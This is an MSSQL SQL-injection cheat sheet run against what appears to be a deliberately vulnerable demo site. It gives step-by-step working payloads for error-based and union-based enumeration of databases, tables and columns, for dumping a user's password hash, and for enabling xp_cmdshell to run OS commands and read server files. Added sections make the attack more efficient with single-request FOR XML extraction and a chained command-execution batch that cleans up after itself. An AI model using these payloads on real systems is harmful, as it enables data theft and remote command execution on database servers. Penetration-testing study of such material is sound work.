MSSQL Injection
(((0x1 :- Basic Recon Stage)))
Union-based probes: first find the column count and a column that echoes text, then read version, schemas, tables, columns and rows through it. The trailing -- comments out whatever the application appends to the query.
-1 union all select 1,2--
-1 union all select null,2--
null union all select 1,null--
1 union all select 1,null--
null union all select @@version,2--
null union all select schema_name,2 from information_schema.schemata--
-1 UNION SELECT table_name,2 FROM information_schema.tables--
null UNION SELECT column_name,2 FROM information_schema.columns WHERE table_name='users'--
-1+UNION+SELECT upass,2 FROM users where uname='admin'--
Error-based extraction: convert(int, <string>) fails, and the SQL Server error message echoes the string it could not convert, so each value below is read from the error page rather than from the normal output.
User name
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,user_name())--
acunetix
Check if the parameter is injectable (boolean test: the first URL renders like the unmodified page, the second does not)
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=1-- [True]
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=2-- [False]
SQL Server version
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select @@version))--
Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
Server name
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select @@servername))--
VPS19760
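The recon values above are collected one request at a time. As an added example (not part of the original page), the single subquery below concatenates them, together with the two privilege checks that decide whether the later xp_cmdshell and BULK INSERT steps can work, so one conversion error returns everything. It assumes the same injection point as the page (the id parameter wrapped in convert(int,(...))) and an application that displays the SQL error text.

```sql
-- Added example, not from the original page. Inject this SELECT as the
-- argument of convert(int,(...)) in the id parameter, e.g.
--   showforum.asp?id=0+and+1=convert(int,(<this SELECT>))--
-- The conversion error then reads:
--   Conversion failed when converting the nvarchar value 'ver=...|...' to data type int.
SELECT
      'ver='        + CAST(SERVERPROPERTY('ProductVersion') AS varchar(32))  -- short form of @@version
    + '|edition='   + CAST(SERVERPROPERTY('Edition') AS varchar(64))
    + '|host='      + CAST(@@servername AS varchar(128))
    + '|login='     + system_user                                             -- server login
    + '|user='      + user_name()                                             -- database user (what 0x1 shows)
    + '|db='        + db_name()                                               -- database the app connects to
    -- IS_SRVROLEMEMBER returns NULL for an unknown role, which would NULL the
    -- whole string and suppress the error, so it is wrapped in ISNULL
    + '|sysadmin='  + CAST(ISNULL(IS_SRVROLEMEMBER('sysadmin'),  -1) AS varchar(2))  -- 1: xp_cmdshell route is open
    + '|bulkadmin=' + CAST(ISNULL(IS_SRVROLEMEMBER('bulkadmin'), -1) AS varchar(2))  -- 1: BULK INSERT allowed without sysadmin
```

When this goes into a GET parameter, every string-concatenation `+` must be sent as `%2B`; a bare `+` in the URL is decoded as a space, which is why the page's own payloads use `+` between keywords.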
(((0x2 :- Enumerating Other Databases)))
[Listing Database Names]
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(1)))--
master
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(2)))--
tempdb
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(3)))--
model
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(4)))--
msdb
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(5)))--
acublog
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(6)))--
acuforum
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(7)))--
acuservice
(((0x3 :- Enumerating Table Names for each database)))
[*]Database : [master]
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM master..sysobjects WHERE xtype = 'U' ),NULL--
spt_fallback_db
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM master..sysobjects WHERE xtype = 'U' AND name not in ('spt_fallback_db') ),NULL--
spt_fallback_dev
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM master..sysobjects WHERE xtype = 'U' AND name not in ('spt_fallback_db','spt_fallback_dev') ),NULL--
spt_fallback_usg
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM master..sysobjects WHERE xtype = 'U' AND name not in ('spt_fallback_db','spt_fallback_dev','spt_fallback_usg') ),NULL--
spt_monitor
And so on: add each returned name to the NOT IN list until the query returns nothing.
[*]Database : [acublog]
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acublog..sysobjects WHERE xtype = 'U' ),NULL--
comments
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acublog..sysobjects WHERE xtype = 'U' AND name not in ('comments') ),NULL--
news
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acublog..sysobjects WHERE xtype = 'U' AND name not in ('comments','news') ),NULL--
users
[*]Database : [acuforum]
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuforum..sysobjects WHERE xtype = 'U' ),NULL--
threads
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuforum..sysobjects WHERE xtype = 'U' AND name not in ('threads')),NULL--
users
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuforum..sysobjects WHERE xtype = 'U' AND name not in ('threads','users')),NULL--
forums
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuforum..sysobjects WHERE xtype = 'U' AND name not in ('threads','users','forums')),NULL--
posts
And so on.
[*]Database : [acuservice]
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuservice..sysobjects WHERE xtype = 'U' ),NULL--
Same walk, one name per request, for this and any other database.
(((0x4 :- Fetching column names for a table, in the same or another database)))
[*]Database : [acublog]
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select top 1 acublog..syscolumns.name FROM acublog..syscolumns, acublog..sysobjects WHERE acublog..syscolumns.id=acublog..sysobjects.id AND acublog..sysobjects.name='users'))--
uname
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select top 1 acublog..syscolumns.name FROM acublog..syscolumns, acublog..sysobjects WHERE acublog..syscolumns.id=acublog..sysobjects.id AND acublog..sysobjects.name='users' AND acublog..syscolumns.name NOT IN ('uname') ))--
upass
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select top 1 acublog..syscolumns.name FROM acublog..syscolumns, acublog..sysobjects WHERE acublog..syscolumns.id=acublog..sysobjects.id AND acublog..sysobjects.name='users' AND acublog..syscolumns.name NOT IN ('uname','upass') ))--
alevel
Same approach for the other tables; for a table in another database, change the database prefix in front of ..syscolumns and ..sysobjects.
(((0x5 :- Fetching Data from Columns)))
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 union all select uname,null from acublog.dbo.users;
admin
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 union all select upass,null from acublog.dbo.users;
334c4a4c42fdb79d7ebc3e73b517e6f8
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 union all select uname,null from acublog.dbo.users WHERE uname NOT IN ('admin');
[Returns nothing here because users holds a single row; when there are more rows, walk them with the same NOT IN pattern used for table and column names.]
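Steps 0x2 to 0x5 above cost one request per database, table, column and row. As an added example (not from the original page), the queries below collapse each level into a single request by concatenating the whole result set with FOR XML PATH('') (SQL Server 2005 and later, which matches the version found in 0x1) and then forcing the page's conversion error so the string is echoed back. The database, table and column names are the page's (acublog, users, uname, upass, alevel); each SELECT goes inside convert(int,(...)) in the id parameter exactly as the page's payloads do.

```sql
-- Added example, not from the original page. Each SELECT below is one request:
--   showforum.asp?id=0+and+1=convert(int,(<SELECT>))--
-- (send string-concatenation '+' as %2B in the URL).

-- 1. All database names in one string (replaces probing db_name(1)..db_name(7)).
SELECT STUFF((SELECT ',' + name FROM master..sysdatabases ORDER BY dbid
              FOR XML PATH('')), 1, 1, '')

-- 2. All user tables of one database (replaces the NOT IN chain of 0x3).
SELECT STUFF((SELECT ',' + name FROM acublog..sysobjects WHERE xtype = 'U' ORDER BY name
              FOR XML PATH('')), 1, 1, '')

-- 3. All columns of acublog..users in column order (replaces 0x4).
SELECT STUFF((SELECT ',' + c.name
              FROM acublog..syscolumns c
              JOIN acublog..sysobjects o ON o.id = c.id
              WHERE o.name = 'users' AND o.xtype = 'U'
              ORDER BY c.colid
              FOR XML PATH('')), 1, 1, '')

-- 4. Every row of acublog..users as uname:upass:alevel (replaces 0x5).
--    The type of alevel is not shown on the page, so it is cast before concatenation;
--    ISNULL keeps a NULL column from blanking the whole row.
SELECT STUFF((SELECT ';' + ISNULL(uname, '') + ':' + ISNULL(upass, '')
                         + ':' + ISNULL(CAST(alevel AS varchar(50)), '')
              FROM acublog.dbo.users
              FOR XML PATH('')), 1, 1, '')

-- 5. Paging: the error text is limited in length, so read a long result in
--    fixed-size windows; only the start offset changes between requests.
SELECT SUBSTRING((SELECT ';' + ISNULL(uname, '') + ':' + ISNULL(upass, '')
                  FROM acublog.dbo.users
                  FOR XML PATH('')), 1, 200)      -- next request: 201, 200 and so on
```

FOR XML PATH escapes `&`, `<` and `>` as XML entities, so values containing those characters come back as `&amp;`, `&lt;` and `&gt;`; the error message still shows them verbatim, and they are decoded on the client side.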
(((0x6 :- Enable xp_cmdshell if the login is sysadmin)))
sp_configure only succeeds when the login the application connects with is a member of the sysadmin server role (sa is the usual case; user_name() from 0x1 shows the database user, not the login). The payload also relies on stacked queries, which the MSSQL driver allows in a single request.
For string parameters:
http://testasp.vulnweb.com/showforum.asp?name=test'; EXEC sp_configure 'show advanced options',1 ; RECONFIGURE ; EXEC sp_configure 'xp_cmdshell',1 ; RECONFIGURE ;--
For integer parameters:
http://testasp.vulnweb.com/showforum.asp?id=0; EXEC sp_configure 'show advanced options',1 ; RECONFIGURE ; EXEC sp_configure 'xp_cmdshell',1 ; RECONFIGURE ;--
(((0x7 :- Reading a local file into a table)))
The path is resolved on the SQL Server host, not the web server, and BULK INSERT needs the bulkadmin role (or sysadmin). Read the rows out with the union or convert payloads above between the insert and the drop.
CREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM 'C:\output.txt';
DROP TABLE mydata;
(((0x8 :- Executing commands through xp_cmdshell)))
xp_cmdshell returns nothing to the page, so redirect the command output to a file and read it back with the BULK INSERT step above.
'; exec xp_cmdshell 'net user > c:\output.txt';--
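The last three steps (enable xp_cmdshell, run a command, read the result through a table) are shown on the page as separate payloads. As an added example (not the page's own code), the batch below chains them in one stacked-query request, gates everything on the sysadmin check the heading refers to, and captures command output directly into a table so nothing has to be written to disk; the file path C:\output.txt is the page's and the table names cmdout and mydata are chosen here for illustration. It assumes stacked queries work in the id parameter, as the page's 0x6 payload already does.

```sql
-- Added example, not from the original page. Send as one stacked batch:
--   showforum.asp?id=0; <this batch> --

-- 0. sp_configure, xp_cmdshell and BULK INSERT all fail for a non-sysadmin
--    login, so do nothing unless the check passes (NULL counts as no).
IF ISNULL(IS_SRVROLEMEMBER('sysadmin'), 0) = 1
BEGIN
    -- 1. xp_cmdshell is off by default from SQL Server 2005 onwards.
    EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

    -- 2. Capture the command output straight into a table. The identity
    --    column preserves line order, which a BULK INSERT of a file would not.
    CREATE TABLE cmdout (id int IDENTITY(1,1), line varchar(8000));
    INSERT INTO cmdout (line) EXEC xp_cmdshell 'net user';

    -- 3. Files that already exist on the SQL Server host still go through
    --    BULK INSERT (the page's 0x7 step), one line per row.
    CREATE TABLE mydata (line varchar(8000));
    BULK INSERT mydata FROM 'C:\output.txt';
END

-- 4. In later requests, read the rows back through the page's conversion-error
--    trick, one line per request:
--   id=0+and+1=convert(int,(SELECT line FROM cmdout WHERE id=1))--   (then id=2, 3, ...)
--   id=0+and+1=convert(int,(SELECT TOP 1 line FROM mydata))--
--    xp_cmdshell ends its output with a NULL row, which convert() ignores.

-- 5. Clean up and restore the configuration in a final request.
DROP TABLE cmdout; DROP TABLE mydata;
EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
EXEC sp_configure 'show advanced options', 0; RECONFIGURE;
```

INSERT ... EXEC xp_cmdshell avoids the file round trip entirely; BULK INSERT is only needed for reading files the command did not produce, and the table it loads has no ordering column, so lines come back in storage order.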